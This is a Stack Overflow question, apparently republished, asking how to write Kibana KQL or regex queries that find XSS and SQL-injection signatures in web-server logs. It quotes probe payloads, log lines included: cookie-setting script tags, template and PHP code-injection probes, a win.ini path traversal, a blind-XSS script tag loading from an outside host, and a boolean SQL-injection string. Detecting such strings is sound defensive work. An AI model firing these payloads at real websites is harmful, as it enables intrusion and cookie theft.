'What is the best practice using KQL to filter desired attack signature over (web)logs?
Recently I'm experimenting with logstach and Kibana on top of elastic over (web-)server logs. I tried to extract some attack signature like XSS & SQL injection like the following examples when logs contain <
$
'
"
!
.\
%22
, and so on:
<script>foo</script>
<script>document.cookie=%22testkzcp=XXX;%22</script>
<meta%20http-equiv=Set-Cookie%20content=%22testvpmi=XXXX%22>
${XXXXXXXXXX+5}.action
'.print(md5(XXXXX)).'
${@print(md5(XXXXX))}\
";print(md5(XXXXX));$a="
!(()&&!|*|*|
.\.\.\.\.\.\.\.\.\.\/windows/win.ini
The following is the common error I get when use "(("
, ".\"
, "OR"
or "$"
and so on using KQL:
KQLSyntaxError: Expected ":", "<", "<=", ">", ">=", AND, OR, end of input, whitespace but ")" found.
I checked The Kibana Query Language (KQL) and tried to use *
as wildcard_queries beside of interesting term "</script>"
or "%22</script>"
through my desired timestamp but it was unsuccessful. I also checked Escaping special characters in elasticsearch.
So The question is, What is the best practice for using KQL to filter/search desired string-based attack signature over logs. Please give an example for the above-mentioned attack signatures.
Edit1: I found the post that says it's possible to solve this problem using Regex in KQL as well as some workaround here & here, So I'm also interested in finding Regex-based solution to find the afore-mentioned pattern in KQL.
update1: pattern of web-request:
[21/Jan/2021:02:02:23 +0000] XX.XXX.XXX.X "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42109 "'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=074623&r=74172-18&h=74172-7bf88-2&"></script>" "'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=074623&r=74172-18&h=74172-7bf88-2&"></script>" - - TLSv1.2 -,-,-
[19/Jan/2021:23:02:37 +0000] XXX.XXX.XXX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42109 "-1" OR 2+190-190-1=0+0+0+1 --" "-1" OR 2+190-190-1=0+0+0+1 --" - - TLSv1.2 -,-,-
[10/Jan/2021:01:11:02 +0000] XXX.XXX.XX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42133 "${@print(md5(31337))}" "${@print(md5(31337))}" - - TLSv1.2 -,-,-
[18/Jan/2022:09:13:00 +0000] XXX.XXX.XX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42133 ")))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))" ")))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))" - - TLSv1.2 -,-,-
Sources
This article follows the attribution requirements of Stack Overflow and is licensed under CC BY-SA 3.0.
Source: Stack Overflow
Solution | Source |
---|